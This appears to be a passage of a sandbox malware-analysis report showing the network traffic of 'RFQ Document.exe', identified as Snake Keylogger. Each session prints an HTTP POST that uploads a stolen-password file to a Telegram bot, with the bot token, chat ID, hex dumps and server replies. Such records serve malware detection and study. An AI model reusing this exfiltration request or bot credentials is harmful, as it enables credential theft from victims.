                                            Data Ascii: --------------------------8d98255cf67dbc5Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:43 UTC167INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:43 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:43 UTC167INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 38 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 32 33 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12687,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808723,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            105192.168.2.449881149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:43 UTC168OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255cf9c5368
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:43 UTC168OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 66 39 63 35 33 36 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255cf9c5368Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:43 UTC168INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:43 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:43 UTC169INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 38 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 32 33 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12688,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808723,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            106192.168.2.449882149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:44 UTC169OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255cfc2757d
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:44 UTC170OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 66 63 32 37 35 37 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255cfc2757dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:44 UTC170INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:44 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:44 UTC170INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 39 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 32 34 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12690,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808724,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            107192.168.2.449883149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:44 UTC171OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255cfda4c26
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:44 UTC171OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 66 64 61 34 63 32 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255cfda4c26Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:44 UTC172INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:44 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:44 UTC172INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 39 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 32 34 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12691,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808724,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            108192.168.2.449884149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:44 UTC172OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255cff94c71
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:44 UTC173OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 66 66 39 34 63 37 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255cff94c71Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:44 UTC173INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:44 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:44 UTC174INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 39 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 32 34 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12692,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808724,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            109192.168.2.449885149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:44 UTC174OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255d018a361
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:44 UTC174OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 30 31 38 61 33 36 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255d018a361Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:44 UTC175INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:44 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:44 UTC175INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 39 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 32 34 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12693,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808724,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            11192.168.2.449785149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:22 UTC17OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255c321840c
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:22 UTC17OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 33 32 31 38 34 30 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255c321840cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:22 UTC18INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:22 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:22 UTC18INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 35 39 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 30 32 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12590,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808702,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            110192.168.2.449886149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:44 UTC176OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255d02dbe7d
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:44 UTC176OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 30 32 64 62 65 37 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255d02dbe7dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:44 UTC176INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:44 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
